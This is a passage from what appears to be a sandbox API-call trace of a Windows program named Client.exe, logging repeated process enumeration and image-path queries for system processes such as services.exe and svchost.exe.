th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.188] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.188] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.189] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.190] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.190] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.191] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.192] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0290.192] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0290.192] CloseHandle (hObject=0x178) returned 1 [0290.192] CloseHandle (hObject=0x170) returned 1 [0290.192] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0290.192] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0290.193] CloseHandle (hObject=0x170) returned 1 [0290.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0958, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0290.193] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x28c) returned 0x170 [0290.193] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.195] CloseHandle (hObject=0x170) returned 1 [0290.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x9e0958, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\svchost.exee", lpUsedDefaultChar=0x0) returned 31 [0290.196] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x28c) returned 0x170 [0290.196] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd40) returned 1 [0290.198] CloseHandle (hObject=0x170) returned 1 [0290.214] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x28c) returned 0x170 [0290.214] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.216] CloseHandle (hObject=0x170) returned 1 [0290.216] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x28c) returned 0x170 [0290.216] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.218] CloseHandle (hObject=0x170) returned 1 [0290.219] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0290.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c0) returned 0x170 [0290.219] GetPriorityClass (hProcess=0x170) returned 0x20 [0290.219] CloseHandle (hObject=0x170) returned 1 [0290.219] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c0) returned 0x170 [0290.219] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd44) returned 1 [0290.221] CloseHandle (hObject=0x170) returned 1 [0290.221] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0290.224] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.225] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.226] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.226] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.227] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.228] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.228] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.229] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.230] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.231] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.231] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.232] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.233] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.234] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0290.234] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0290.234] CloseHandle (hObject=0x178) returned 1 [0290.234] CloseHandle (hObject=0x170) returned 1 [0290.234] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0290.234] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0290.236] CloseHandle (hObject=0x170) returned 1 [0290.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0988, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0290.236] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c0) returned 0x170 [0290.236] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.239] CloseHandle (hObject=0x170) returned 1 [0290.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x9e0988, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\svchost.exee", lpUsedDefaultChar=0x0) returned 31 [0290.239] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c0) returned 0x170 [0290.239] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd40) returned 1 [0290.242] CloseHandle (hObject=0x170) returned 1 [0290.242] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c0) returned 0x170 [0290.242] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.246] CloseHandle (hObject=0x170) returned 1 [0290.246] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c0) returned 0x170 [0290.246] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.249] CloseHandle (hObject=0x170) returned 1 [0290.249] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0290.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x170 [0290.250] GetPriorityClass (hProcess=0x170) returned 0x20 [0290.250] CloseHandle (hObject=0x170) returned 1 [0290.250] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x170 [0290.250] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd44) returned 1 [0290.253] CloseHandle (hObject=0x170) returned 1 [0290.253] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0290.257] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.258] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.259] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.324] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.324] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.325] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.326] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.326] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.327] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.328] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.328] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.329] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.330] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.330] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.331] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0290.331] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0290.331] CloseHandle (hObject=0x178) returned 1 [0290.331] CloseHandle (hObject=0x170) returned 1 [0290.331] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0290.331] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0290.333] CloseHandle (hObject=0x170) returned 1 [0290.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e09b8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0290.333] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x170 [0290.333] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.335] CloseHandle (hObject=0x170) returned 1 [0290.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x9e09b8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\svchost.exee", lpUsedDefaultChar=0x0) returned 31 [0290.335] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x170 [0290.335] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd40) returned 1 [0290.337] CloseHandle (hObject=0x170) returned 1 [0290.337] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x170 [0290.337] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.340] CloseHandle (hObject=0x170) returned 1 [0290.340] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x170 [0290.340] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.342] CloseHandle (hObject=0x170) returned 1 [0290.342] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0290.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x360) returned 0x170 [0290.342] GetPriorityClass (hProcess=0x170) returned 0x20 [0290.342] CloseHandle (hObject=0x170) returned 1 [0290.342] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x360) returned 0x170 [0290.342] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd44) returned 1 [0290.344] CloseHandle (hObject=0x170) returned 1 [0290.344] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0290.348] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.348] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.349] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.350] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.350] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.351] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, 